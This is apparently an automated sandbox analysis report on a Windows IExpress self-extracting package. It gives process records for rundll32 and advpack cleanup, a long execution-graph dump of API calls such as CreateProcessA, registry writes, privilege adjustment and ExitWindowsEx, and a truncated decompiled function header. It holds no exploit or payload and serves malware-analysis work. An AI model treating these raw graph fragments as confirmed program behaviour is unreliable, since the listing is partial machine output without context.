                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                  Start time:21:18:12
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                  Imagebase:0x7ff6e8c60000
                                                                                                                                                                                                  File size:69632 bytes
                                                                                                                                                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                  Start time:21:18:20
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                  Imagebase:0x7ff6e8c60000
                                                                                                                                                                                                  File size:69632 bytes
                                                                                                                                                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high


                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:28.6%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                    Signature Coverage:26.8%
                                                                                                                                                                                                    Total number of Nodes:959
                                                                                                                                                                                                    Total number of Limit Nodes:24
execution_graph: node/edge listing of the execution graph (rendered as an interactive call graph of function addresses and API calls in the original report; not reproducible as text)
2377 1771cd 2374->2377 2375->2374 2376 1771e2 2375->2376 2376->2358 2377->2376 2379 172c50 2378->2379 2380 172c0f 2378->2380 2395 172caa memset memset memset 2379->2395 2380->2379 2382 172c13 GetModuleHandleW 2380->2382 2382->2379 2384 172c22 GetProcAddress 2382->2384 2384->2379 2392 172c34 2384->2392 2385 172c8e 2387 172c97 CloseHandle 2385->2387 2388 172c9e 2385->2388 2387->2388 2388->2368 2392->2379 2393 172c89 2489 171f90 2393->2489 2506 17468f FindResourceA SizeofResource 2395->2506 2398 172ef3 2401 1744b9 20 API calls 2398->2401 2399 172d2d CreateEventA SetEvent 2400 17468f 7 API calls 2399->2400 2403 172d57 2400->2403 2402 172d6e 2401->2402 2407 176ce0 4 API calls 2402->2407 2404 172d5b 2403->2404 2406 172e1f 2403->2406 2409 17468f 7 API calls 2403->2409 2405 1744b9 20 API calls 2404->2405 2405->2402 2511 175c9e 2406->2511 2410 172c62 2407->2410 2412 172d9f 2409->2412 2410->2385 2436 172f1d 2410->2436 2412->2404 2415 172da3 CreateMutexA 2412->2415 2413 172e30 2413->2398 2414 172e3a 2416 172e43 2414->2416 2417 172e52 FindResourceA 2414->2417 2415->2406 2418 172dbd GetLastError 2415->2418 2537 172390 2416->2537 2421 172e64 LoadResource 2417->2421 2422 172e6e 2417->2422 2418->2406 2420 172dca 2418->2420 2424 172dd5 2420->2424 2425 172dea 2420->2425 2421->2422 2423 172e4d 2422->2423 2552 1736ee GetVersionExA 2422->2552 2423->2402 2426 1744b9 20 API calls 2424->2426 2427 1744b9 20 API calls 2425->2427 2428 172de8 2426->2428 2429 172dff 2427->2429 2431 172e04 CloseHandle 2428->2431 2429->2406 2429->2431 2431->2402 2435 176517 24 API calls 2435->2423 2437 172f3f 2436->2437 2438 172f6c 2436->2438 2440 172f5f 2437->2440 2641 1751e5 2437->2641 2660 175164 2438->2660 2788 173a3f 2440->2788 2442 172f71 2445 17303c 2442->2445 2673 1755a0 2442->2673 2449 176ce0 4 API calls 2445->2449 2450 172c6b 2449->2450 2476 1752b6 2450->2476 2451 172f86 GetSystemDirectoryA 2452 17658a CharPrevA 2451->2452 2453 172fab LoadLibraryA 2452->2453 2454 172ff7 FreeLibrary 2453->2454 2455 
172fc0 GetProcAddress 2453->2455 2456 173017 SetCurrentDirectoryA 2454->2456 2457 173006 2454->2457 2455->2454 2458 172fd6 DecryptFileA 2455->2458 2459 173026 2456->2459 2460 173054 2456->2460 2457->2456 2721 17621e GetWindowsDirectoryA 2457->2721 2458->2454 2465 172ff0 2458->2465 2464 1744b9 20 API calls 2459->2464 2462 173061 2460->2462 2731 173b26 2460->2731 2462->2445 2467 17307a 2462->2467 2740 17256d 2462->2740 2469 173037 2464->2469 2465->2454 2472 173098 2467->2472 2751 173ba2 2467->2751 2807 176285 GetLastError 2469->2807 2472->2445 2473 1730af 2472->2473 2809 174169 2473->2809 2477 1752d6 2476->2477 2485 175316 2476->2485 2478 175300 LocalFree LocalFree 2477->2478 2480 1752eb SetFileAttributesA DeleteFileA 2477->2480 2478->2477 2478->2485 2479 17538c 2482 176ce0 4 API calls 2479->2482 2480->2478 2481 175374 2481->2479 3115 171fe1 2481->3115 2484 172c72 2482->2484 2484->2385 2484->2393 2485->2481 2486 17535e SetCurrentDirectoryA 2485->2486 2487 1765e8 4 API calls 2485->2487 2488 172390 13 API calls 2486->2488 2487->2486 2488->2481 2490 171f9f 2489->2490 2491 171f9a 2489->2491 2493 171fc0 2490->2493 2496 1744b9 20 API calls 2490->2496 2497 171fd9 2490->2497 2492 171ea7 15 API calls 2491->2492 2492->2490 2494 171fcf ExitWindowsEx 2493->2494 2495 171ee2 GetCurrentProcess OpenProcessToken 2493->2495 2493->2497 2494->2497 2499 171f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2500 171f0e 2495->2500 2496->2493 2497->2385 2499->2500 2501 171f6b ExitWindowsEx 2499->2501 2503 1744b9 20 API calls 2500->2503 2501->2500 2502 171f1f 2501->2502 2504 176ce0 4 API calls 2502->2504 2503->2502 2505 171f8c 2504->2505 2505->2385 2507 1746b6 2506->2507 2509 172d1a 2506->2509 2508 1746be FindResourceA LoadResource LockResource 2507->2508 2507->2509 2508->2509 2510 1746df memcpy_s FreeResource 2508->2510 2509->2398 2509->2399 2510->2509 2517 175e17 2511->2517 2534 175cc3 2511->2534 2512 175dd0 2516 175dec GetModuleFileNameA 2512->2516 2512->2517 2513 
176ce0 4 API calls 2515 172e2c 2513->2515 2514 175ced CharNextA 2514->2534 2515->2413 2515->2414 2516->2517 2518 175e0a 2516->2518 2517->2513 2587 1766c8 2518->2587 2520 176218 2596 176e2a 2520->2596 2523 175e36 CharUpperA 2524 1761d0 2523->2524 2523->2534 2525 1744b9 20 API calls 2524->2525 2526 1761e7 2525->2526 2527 1761f7 ExitProcess 2526->2527 2528 1761f0 CloseHandle 2526->2528 2528->2527 2529 175f9f CharUpperA 2529->2534 2530 176003 CharUpperA 2530->2534 2531 175f59 CompareStringA 2531->2534 2532 175edc CharUpperA 2532->2534 2533 1760a2 CharUpperA 2533->2534 2534->2512 2534->2514 2534->2517 2534->2520 2534->2523 2534->2529 2534->2530 2534->2531 2534->2532 2534->2533 2535 17667f IsDBCSLeadByte CharNextA 2534->2535 2592 17658a 2534->2592 2535->2534 2538 1724cb 2537->2538 2541 1723b9 2537->2541 2539 176ce0 4 API calls 2538->2539 2540 1724dc 2539->2540 2540->2423 2541->2538 2542 1723e9 FindFirstFileA 2541->2542 2542->2538 2543 172407 2542->2543 2544 172421 lstrcmpA 2543->2544 2545 172479 2543->2545 2547 1724a9 FindNextFileA 2543->2547 2550 17658a CharPrevA 2543->2550 2551 172390 5 API calls 2543->2551 2546 172431 lstrcmpA 2544->2546 2544->2547 2548 172488 SetFileAttributesA DeleteFileA 2545->2548 2546->2543 2546->2547 2547->2543 2549 1724bd FindClose RemoveDirectoryA 2547->2549 2548->2547 2549->2538 2550->2543 2551->2543 2557 173737 2552->2557 2558 17372d 2552->2558 2553 1744b9 20 API calls 2554 1739fc 2553->2554 2555 176ce0 4 API calls 2554->2555 2556 172e92 2555->2556 2556->2402 2556->2423 2567 1718a3 2556->2567 2557->2554 2557->2558 2560 1738a4 2557->2560 2603 1728e8 2557->2603 2558->2553 2558->2554 2560->2554 2560->2558 2561 1739c1 MessageBeep 2560->2561 2562 17681f 10 API calls 2561->2562 2563 1739ce 2562->2563 2564 1739d8 MessageBoxA 2563->2564 2565 1767c9 EnumResourceLanguagesA 2563->2565 2564->2554 2565->2564 2568 1718d5 2567->2568 2569 1719b8 2567->2569 2632 1717ee LoadLibraryA 2568->2632 2571 176ce0 4 API calls 2569->2571 2573 1719d5 2571->2573 
2573->2423 2573->2435 2574 1718e5 GetCurrentProcess OpenProcessToken 2574->2569 2575 171900 GetTokenInformation 2574->2575 2576 1719aa CloseHandle 2575->2576 2577 171918 GetLastError 2575->2577 2576->2569 2577->2576 2578 171927 LocalAlloc 2577->2578 2579 1719a9 2578->2579 2580 171938 GetTokenInformation 2578->2580 2579->2576 2581 1719a2 LocalFree 2580->2581 2582 17194e AllocateAndInitializeSid 2580->2582 2581->2579 2582->2581 2585 17196e 2582->2585 2583 171999 FreeSid 2583->2581 2584 171975 EqualSid 2584->2585 2586 17198c 2584->2586 2585->2583 2585->2584 2585->2586 2586->2583 2591 1766d5 2587->2591 2588 1766f3 2588->2517 2590 1766e5 CharNextA 2590->2591 2591->2588 2591->2590 2599 176648 2591->2599 2593 17659b 2592->2593 2593->2593 2594 1765ab 2593->2594 2595 1765b8 CharPrevA 2593->2595 2594->2534 2595->2594 2602 176cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 17621d 2600 17665d IsDBCSLeadByte 2599->2600 2601 176668 2599->2601 2600->2601 2601->2591 2602->2598 2604 172a62 2603->2604 2611 17290d 2603->2611 2605 172a75 2604->2605 2606 172a6e GlobalFree 2604->2606 2605->2560 2606->2605 2608 172955 GlobalAlloc 2608->2604 2609 172968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 172a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 172a80 GlobalUnlock 2611->2612 2613 172773 2611->2613 2612->2604 2614 1727a3 CharUpperA CharNextA CharNextA 2613->2614 2615 1728b2 2613->2615 2616 1728b7 GetSystemDirectoryA 2614->2616 2617 1727db 2614->2617 2615->2616 2620 1728bf 2616->2620 2618 1727e3 2617->2618 2619 1728a8 GetWindowsDirectoryA 2617->2619 2624 17658a CharPrevA 2618->2624 2619->2620 2621 1728d2 2620->2621 2622 17658a CharPrevA 2620->2622 2623 176ce0 4 API calls 2621->2623 2622->2621 2625 1728e2 2623->2625 2626 172810 RegOpenKeyExA 2624->2626 2625->2611 2626->2620 2627 172837 RegQueryValueExA 2626->2627 2628 17285c 2627->2628 2629 17289a RegCloseKey 2627->2629 2630 172867 ExpandEnvironmentStringsA 
2628->2630 2631 17287a 2628->2631 2629->2620 2630->2631 2631->2629 2633 171826 GetProcAddress 2632->2633 2634 171890 2632->2634 2635 171889 FreeLibrary 2633->2635 2636 171839 AllocateAndInitializeSid 2633->2636 2637 176ce0 4 API calls 2634->2637 2635->2634 2636->2635 2640 17185f FreeSid 2636->2640 2638 17189f 2637->2638 2638->2569 2638->2574 2640->2635 2642 17468f 7 API calls 2641->2642 2643 1751f9 LocalAlloc 2642->2643 2644 17522d 2643->2644 2645 17520d 2643->2645 2646 17468f 7 API calls 2644->2646 2647 1744b9 20 API calls 2645->2647 2648 17523a 2646->2648 2649 17521e 2647->2649 2650 175262 lstrcmpA 2648->2650 2651 17523e 2648->2651 2652 176285 GetLastError 2649->2652 2654 175272 LocalFree 2650->2654 2655 17527e 2650->2655 2653 1744b9 20 API calls 2651->2653 2657 172f4d 2652->2657 2656 17524f LocalFree 2653->2656 2654->2657 2658 1744b9 20 API calls 2655->2658 2656->2657 2657->2438 2657->2440 2657->2445 2659 175290 LocalFree 2658->2659 2659->2657 2661 17468f 7 API calls 2660->2661 2662 175175 2661->2662 2663 17517a 2662->2663 2664 1751af 2662->2664 2665 1744b9 20 API calls 2663->2665 2666 17468f 7 API calls 2664->2666 2667 17518d 2665->2667 2668 1751c0 2666->2668 2667->2442 2822 176298 2668->2822 2671 1751e1 2671->2442 2672 1744b9 20 API calls 2672->2667 2674 17468f 7 API calls 2673->2674 2675 1755c7 LocalAlloc 2674->2675 2676 1755fd 2675->2676 2677 1755db 2675->2677 2678 17468f 7 API calls 2676->2678 2679 1744b9 20 API calls 2677->2679 2680 17560a 2678->2680 2681 1755ec 2679->2681 2682 175632 lstrcmpA 2680->2682 2683 17560e 2680->2683 2684 176285 GetLastError 2681->2684 2686 175645 2682->2686 2687 17564b LocalFree 2682->2687 2685 1744b9 20 API calls 2683->2685 2709 1755f1 2684->2709 2688 17561f LocalFree 2685->2688 2686->2687 2689 175696 2687->2689 2690 17565b 2687->2690 2688->2709 2691 17589f 2689->2691 2694 1756ae GetTempPathA 2689->2694 2698 175467 49 API calls 2690->2698 2692 176517 24 API calls 2691->2692 2692->2709 2693 176ce0 4 API calls 2695 172f7e 
2693->2695 2696 1756eb 2694->2696 2697 1756c3 2694->2697 2695->2445 2695->2451 2703 175717 GetDriveTypeA 2696->2703 2704 17586c GetWindowsDirectoryA 2696->2704 2696->2709 2834 175467 2697->2834 2699 175678 2698->2699 2702 1744b9 20 API calls 2699->2702 2699->2709 2702->2709 2705 175730 GetFileAttributesA 2703->2705 2719 17572b 2703->2719 2868 17597d GetCurrentDirectoryA SetCurrentDirectoryA 2704->2868 2705->2719 2709->2693 2710 175467 49 API calls 2710->2696 2711 172630 21 API calls 2711->2719 2713 1757c1 GetWindowsDirectoryA 2713->2719 2714 17597d 34 API calls 2714->2719 2715 17658a CharPrevA 2716 1757e8 GetFileAttributesA 2715->2716 2717 1757fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 175827 SetFileAttributesA 2718->2719 2719->2703 2719->2704 2719->2705 2719->2709 2719->2711 2719->2713 2719->2714 2719->2715 2719->2718 2720 175467 49 API calls 2719->2720 2864 176952 2719->2864 2720->2719 2722 176249 2721->2722 2723 176268 2721->2723 2724 1744b9 20 API calls 2722->2724 2725 17597d 34 API calls 2723->2725 2726 17625a 2724->2726 2727 17625f 2725->2727 2728 176285 GetLastError 2726->2728 2729 176ce0 4 API calls 2727->2729 2728->2727 2730 173013 2729->2730 2730->2445 2730->2456 2733 173b2d 2731->2733 2732 173b72 2934 174fe0 2732->2934 2733->2732 2734 173b53 2733->2734 2736 176517 24 API calls 2734->2736 2737 173b70 2736->2737 2738 176298 10 API calls 2737->2738 2739 173b7b 2737->2739 2738->2739 2739->2462 2741 172583 2740->2741 2742 172622 2740->2742 2744 17258b 2741->2744 2745 1725e8 RegOpenKeyExA 2741->2745 2961 1724e0 GetWindowsDirectoryA 2742->2961 2746 1725e3 2744->2746 2749 17259b RegOpenKeyExA 2744->2749 2745->2746 2747 172609 RegQueryInfoKeyA 2745->2747 2746->2467 2748 1725d1 RegCloseKey 2747->2748 2748->2746 2749->2746 2750 1725bc RegQueryValueExA 2749->2750 2750->2748 2752 173bdb 2751->2752 2768 173bec 2751->2768 2754 17468f 7 API calls 2752->2754 2753 173c03 memset 2753->2768 2754->2768 2755 173d13 2757 1744b9 20 API calls 2755->2757 2756 
17468f 7 API calls 2756->2768 2763 173d26 2757->2763 2759 176ce0 4 API calls 2760 173f60 2759->2760 2760->2472 2761 173d7b CompareStringA 2762 173fd7 2761->2762 2761->2768 2762->2763 3060 172267 2762->3060 2763->2759 2764 173fab 2767 1744b9 20 API calls 2764->2767 2770 173fbe LocalFree 2767->2770 2768->2753 2768->2755 2768->2756 2768->2761 2768->2762 2768->2763 2768->2764 2771 173f46 LocalFree 2768->2771 2772 173f1e LocalFree 2768->2772 2774 173cc7 CompareStringA 2768->2774 2785 173e10 2768->2785 2969 171ae8 2768->2969 3010 17202a memset memset RegCreateKeyExA 2768->3010 3036 173fef 2768->3036 2770->2763 2771->2763 2772->2762 2772->2768 2774->2768 2775 173f92 2778 1744b9 20 API calls 2775->2778 2776 173e1f GetProcAddress 2777 173f64 2776->2777 2776->2785 2779 1744b9 20 API calls 2777->2779 2780 173fa9 2778->2780 2781 173f75 FreeLibrary 2779->2781 2782 173f7c LocalFree 2780->2782 2781->2782 2783 176285 GetLastError 2782->2783 2784 173f8b 2783->2784 2784->2763 2785->2775 2785->2776 2786 173f40 FreeLibrary 2785->2786 2787 173eff FreeLibrary 2785->2787 3050 176495 2785->3050 2786->2771 2787->2772 2789 17468f 7 API calls 2788->2789 2790 173a55 LocalAlloc 2789->2790 2791 173a8e 2790->2791 2792 173a6c 2790->2792 2794 17468f 7 API calls 2791->2794 2793 1744b9 20 API calls 2792->2793 2795 173a7d 2793->2795 2796 173a98 2794->2796 2797 176285 GetLastError 2795->2797 2798 173ac5 lstrcmpA 2796->2798 2799 173a9c 2796->2799 2805 172f64 2797->2805 2801 173b0d LocalFree 2798->2801 2802 173ada 2798->2802 2800 1744b9 20 API calls 2799->2800 2803 173aad LocalFree 2800->2803 2801->2805 2804 176517 24 API calls 2802->2804 2803->2805 2806 173aec LocalFree 2804->2806 2805->2438 2805->2445 2806->2805 2808 17628f 2807->2808 2808->2445 2810 17468f 7 API calls 2809->2810 2811 17417d LocalAlloc 2810->2811 2812 174195 2811->2812 2813 1741a8 2811->2813 2814 1744b9 20 API calls 2812->2814 2815 17468f 7 API calls 2813->2815 2816 1741a6 2814->2816 2817 1741b5 2815->2817 2816->2445 2818 1741c5 
lstrcmpA 2817->2818 2819 1741b9 2817->2819 2818->2819 2820 1741e6 LocalFree 2818->2820 2821 1744b9 20 API calls 2819->2821 2820->2816 2821->2820 2823 17171e _vsnprintf 2822->2823 2824 1762c9 FindResourceA 2823->2824 2826 176353 2824->2826 2827 1762cb LoadResource LockResource 2824->2827 2828 176ce0 4 API calls 2826->2828 2827->2826 2830 1762e0 2827->2830 2829 1751ca 2828->2829 2829->2671 2829->2672 2831 176355 FreeResource 2830->2831 2832 17631b FreeResource 2830->2832 2831->2826 2833 17171e _vsnprintf 2832->2833 2833->2824 2835 17548a 2834->2835 2837 17551a 2834->2837 2894 1753a1 2835->2894 2905 1758c8 2837->2905 2838 175581 2842 176ce0 4 API calls 2838->2842 2841 175495 2841->2838 2847 1754c2 GetSystemInfo 2841->2847 2848 17550c 2841->2848 2849 17559a 2842->2849 2843 17554d 2843->2838 2850 17597d 34 API calls 2843->2850 2844 17553b CreateDirectoryA 2845 175577 2844->2845 2846 175547 2844->2846 2851 176285 GetLastError 2845->2851 2846->2843 2855 1754da 2847->2855 2852 17658a CharPrevA 2848->2852 2849->2709 2858 172630 GetWindowsDirectoryA 2849->2858 2853 17555c 2850->2853 2854 17557c 2851->2854 2852->2837 2853->2838 2857 175568 RemoveDirectoryA 2853->2857 2854->2838 2855->2848 2856 17658a CharPrevA 2855->2856 2856->2848 2857->2838 2859 17266f 2858->2859 2860 17265e 2858->2860 2862 176ce0 4 API calls 2859->2862 2861 1744b9 20 API calls 2860->2861 2861->2859 2863 172687 2862->2863 2863->2696 2863->2710 2865 1769a1 2864->2865 2866 17696e GetDiskFreeSpaceA 2864->2866 2865->2719 2866->2865 2867 176989 MulDiv 2866->2867 2867->2865 2869 1759dd GetDiskFreeSpaceA 2868->2869 2870 1759bb 2868->2870 2871 175ba1 memset 2869->2871 2872 175a21 MulDiv 2869->2872 2873 1744b9 20 API calls 2870->2873 2874 176285 GetLastError 2871->2874 2872->2871 2875 175a50 GetVolumeInformationA 2872->2875 2876 1759cc 2873->2876 2877 175bbc GetLastError FormatMessageA 2874->2877 2878 175ab5 SetCurrentDirectoryA 2875->2878 2879 175a6e memset 2875->2879 2880 176285 GetLastError 2876->2880 2881 175be3 
2877->2881 2889 175acc 2878->2889 2882 176285 GetLastError 2879->2882 2887 1759d1 2880->2887 2883 1744b9 20 API calls 2881->2883 2884 175a89 GetLastError FormatMessageA 2882->2884 2885 175bf5 SetCurrentDirectoryA 2883->2885 2884->2881 2885->2887 2886 176ce0 4 API calls 2888 175c11 2886->2888 2887->2886 2888->2696 2890 175b0a 2889->2890 2892 175b20 2889->2892 2891 1744b9 20 API calls 2890->2891 2891->2887 2892->2887 2917 17268b 2892->2917 2896 1753bf 2894->2896 2895 17171e _vsnprintf 2895->2896 2896->2895 2897 17658a CharPrevA 2896->2897 2900 175415 GetTempFileNameA 2896->2900 2898 1753fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 17544f CreateDirectoryA 2898->2899 2899->2900 2901 17543a 2899->2901 2900->2901 2902 175429 DeleteFileA CreateDirectoryA 2900->2902 2903 176ce0 4 API calls 2901->2903 2902->2901 2904 175449 2903->2904 2904->2841 2906 1758d8 2905->2906 2906->2906 2907 1758df LocalAlloc 2906->2907 2908 1758f3 2907->2908 2909 175919 2907->2909 2910 1744b9 20 API calls 2908->2910 2912 17658a CharPrevA 2909->2912 2911 175906 2910->2911 2913 176285 GetLastError 2911->2913 2915 175534 2911->2915 2914 175931 CreateFileA LocalFree 2912->2914 2913->2915 2914->2911 2916 17595b CloseHandle GetFileAttributesA 2914->2916 2915->2843 2915->2844 2916->2911 2918 1726e5 2917->2918 2919 1726b9 2917->2919 2920 17271f 2918->2920 2921 1726ea 2918->2921 2922 17171e _vsnprintf 2919->2922 2924 1726e3 2920->2924 2927 17171e _vsnprintf 2920->2927 2923 17171e _vsnprintf 2921->2923 2925 1726cc 2922->2925 2926 1726fd 2923->2926 2928 176ce0 4 API calls 2924->2928 2929 1744b9 20 API calls 2925->2929 2930 1744b9 20 API calls 2926->2930 2931 172735 2927->2931 2932 17276d 2928->2932 2929->2924 2930->2924 2933 1744b9 20 API calls 2931->2933 2932->2887 2933->2924 2935 17468f 7 API calls 2934->2935 2936 174ff5 FindResourceA LoadResource LockResource 2935->2936 2937 175020 2936->2937 2949 17515f 2936->2949 2938 175057 2937->2938 2939 175029 GetDlgItem ShowWindow GetDlgItem 
ShowWindow 2937->2939 2953 174efd 2938->2953 2939->2938 2942 175060 2944 1744b9 20 API calls 2942->2944 2943 17507c 2945 1744b9 20 API calls 2943->2945 2950 175075 2943->2950 2944->2950 2945->2950 2946 175110 FreeResource 2947 17511d 2946->2947 2948 17513a 2947->2948 2951 1744b9 20 API calls 2947->2951 2948->2949 2952 17514c SendMessageA 2948->2952 2949->2737 2950->2946 2950->2947 2951->2948 2952->2949 2954 174f4a 2953->2954 2955 174980 25 API calls 2954->2955 2960 174fa1 2954->2960 2958 174f67 2955->2958 2956 176ce0 4 API calls 2957 174fc6 2956->2957 2957->2942 2957->2943 2959 174b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 172510 2961->2962 2963 17255b 2961->2963 2964 17658a CharPrevA 2962->2964 2965 176ce0 4 API calls 2963->2965 2966 172522 WritePrivateProfileStringA _lopen 2964->2966 2967 172569 2965->2967 2966->2963 2968 172548 _llseek _lclose 2966->2968 2967->2746 2968->2963 2970 171b25 2969->2970 3074 171a84 2970->3074 2972 171b57 2973 17658a CharPrevA 2972->2973 2975 171b8c 2972->2975 2973->2975 2974 1766c8 2 API calls 2976 171bd1 2974->2976 2975->2974 2977 171d73 2976->2977 2978 171bd9 CompareStringA 2976->2978 2980 1766c8 2 API calls 2977->2980 2978->2977 2979 171bf7 GetFileAttributesA 2978->2979 2981 171d53 2979->2981 2982 171c0d 2979->2982 2983 171d7d 2980->2983 2984 171d64 2981->2984 2982->2981 2989 171a84 2 API calls 2982->2989 2985 171d81 CompareStringA 2983->2985 2986 171df8 LocalAlloc 2983->2986 2987 1744b9 20 API calls 2984->2987 2985->2986 2994 171d9b 2985->2994 2986->2984 2988 171e0b GetFileAttributesA 2986->2988 2990 171d6c 2987->2990 2991 171e1d 2988->2991 3008 171e45 2988->3008 2992 171c31 2989->2992 2996 176ce0 4 API calls 2990->2996 2991->3008 2993 171c50 LocalAlloc 2992->2993 2998 171a84 2 API calls 2992->2998 2993->2984 2995 171c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->2995 2994->2994 2997 171dbe LocalAlloc 2994->2997 3003 171cf8 2995->3003 3007 171cc2 2995->3007 3001 171ea1 2996->3001 
2997->2984 3002 171de1 2997->3002 2998->2993 3001->2768 3004 17171e _vsnprintf 3002->3004 3005 171d23 3003->3005 3006 171d09 GetShortPathNameA 3003->3006 3004->3007 3009 17171e _vsnprintf 3005->3009 3006->3005 3007->2990 3080 172aac 3008->3080 3009->3007 3011 17209a 3010->3011 3019 172256 3010->3019 3014 17171e _vsnprintf 3011->3014 3016 1720dc 3011->3016 3012 176ce0 4 API calls 3013 172263 3012->3013 3013->2768 3015 1720af RegQueryValueExA 3014->3015 3015->3011 3015->3016 3017 1720e4 RegCloseKey 3016->3017 3018 1720fb GetSystemDirectoryA 3016->3018 3017->3019 3020 17658a CharPrevA 3018->3020 3019->3012 3021 17211b LoadLibraryA 3020->3021 3022 17212e GetProcAddress FreeLibrary 3021->3022 3023 172179 GetModuleFileNameA 3021->3023 3022->3023 3024 17214e GetSystemDirectoryA 3022->3024 3025 1721de RegCloseKey 3023->3025 3028 172177 3023->3028 3026 172165 3024->3026 3024->3028 3025->3019 3027 17658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 1721b7 LocalAlloc 3028->3029 3030 1721cd 3029->3030 3031 1721ec 3029->3031 3032 1744b9 20 API calls 3030->3032 3033 17171e _vsnprintf 3031->3033 3032->3025 3034 172218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3019 3037 174016 CreateProcessA 3036->3037 3049 174106 3036->3049 3038 1740c4 3037->3038 3039 174041 WaitForSingleObject GetExitCodeProcess 3037->3039 3041 176285 GetLastError 3038->3041 3042 174070 3039->3042 3040 176ce0 4 API calls 3043 174117 3040->3043 3045 1740c9 GetLastError FormatMessageA 3041->3045 3107 17411b 3042->3107 3043->2768 3047 1744b9 20 API calls 3045->3047 3046 174096 CloseHandle CloseHandle 3048 1740ba 3046->3048 3046->3049 3047->3049 3048->3049 3049->3040 3051 1764c2 3050->3051 3052 17658a CharPrevA 3051->3052 3053 1764d8 GetFileAttributesA 3052->3053 3054 176501 LoadLibraryA 3053->3054 3055 1764ea 3053->3055 3057 176508 3054->3057 3055->3054 3056 1764ee LoadLibraryExA 3055->3056 3056->3057 3058 176ce0 4 API calls 3057->3058 3059 176513 3058->3059 3059->2785 3061 172381 3060->3061 3062 
172289 RegOpenKeyExA 3060->3062 3064 176ce0 4 API calls 3061->3064 3062->3061 3063 1722b1 RegQueryValueExA 3062->3063 3065 1722e6 memset GetSystemDirectoryA 3063->3065 3066 172374 RegCloseKey 3063->3066 3067 17238c 3064->3067 3068 172321 3065->3068 3069 17230f 3065->3069 3066->3061 3067->2763 3071 17171e _vsnprintf 3068->3071 3070 17658a CharPrevA 3069->3070 3070->3068 3072 17233f RegSetValueExA 3071->3072 3072->3066 3075 171a9a 3074->3075 3077 171aba 3075->3077 3078 171aaf 3075->3078 3093 17667f 3075->3093 3077->2972 3078->3077 3079 17667f 2 API calls 3078->3079 3079->3078 3081 172ad4 GetModuleFileNameA 3080->3081 3082 172be6 3080->3082 3092 172b02 3081->3092 3083 176ce0 4 API calls 3082->3083 3085 172bf5 3083->3085 3084 172af1 IsDBCSLeadByte 3084->3092 3085->2990 3086 172b11 CharNextA CharUpperA 3088 172b8d CharUpperA 3086->3088 3086->3092 3087 172bca CharNextA 3089 172bd3 CharNextA 3087->3089 3088->3092 3089->3092 3091 172b43 CharPrevA 3091->3092 3092->3082 3092->3084 3092->3086 3092->3087 3092->3089 3092->3091 3098 1765e8 3092->3098 3094 176689 3093->3094 3095 176648 IsDBCSLeadByte 3094->3095 3096 176697 CharNextA 3094->3096 3097 1766a5 3094->3097 3095->3094 3096->3094 3097->3075 3099 1765f4 3098->3099 3099->3099 3100 1765fb CharPrevA 3099->3100 3101 176611 CharPrevA 3100->3101 3102 17661e 3101->3102 3103 17660b 3101->3103 3104 17663d 3102->3104 3105 176627 CharPrevA 3102->3105 3106 176634 CharNextA 3102->3106 3103->3101 3103->3102 3104->3092 3105->3104 3105->3106 3106->3104 3108 174132 3107->3108 3110 17412a 3107->3110 3111 171ea7 3108->3111 3110->3046 3112 171eba 3111->3112 3113 171ed3 3111->3113 3114 17256d 15 API calls 3112->3114 3113->3110 3114->3113 3116 172026 3115->3116 3117 171ff0 RegOpenKeyExA 3115->3117 3116->2479 3117->3116 3118 17200f RegDeleteValueA RegCloseKey 3117->3118 3118->3116 3266 176a20 __getmainargs 3267 1719e0 3268 171a24 GetDesktopWindow 3267->3268 3271 171a03 3267->3271 3269 1743d0 11 API calls 3268->3269 3273 171a33 LoadStringA 
SetDlgItemTextA MessageBeep 3269->3273 3270 171a20 3274 176ce0 4 API calls 3270->3274 3271->3270 3272 171a16 EndDialog 3271->3272 3272->3270 3273->3270 3275 171a7e 3274->3275 3276 176bef _XcptFilter

Callgraph


Control-flow Graph

C-Code - Quality: 82%

E00173BA2() {
	signed int _v8;
	signed int _v12;
	char _v276;
	char _v280;
	short _v300;
	intOrPtr _v304;
	void _v348;
	char _v352;
	intOrPtr _v356;
	signed int _v360;
	short _v364;
	char* _v368;
	intOrPtr _v372;
	void* _v376;
	intOrPtr _v380;
	char _v384;
	signed int _v388;
	intOrPtr _v392;
	signed int _v396;
	signed int _v400;
	signed int _v404;
	void* _v408;
	void* _v424;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t69;
	signed int _t76;
	void* _t77;
	signed int _t79;
	short _t96;
	signed int _t97;
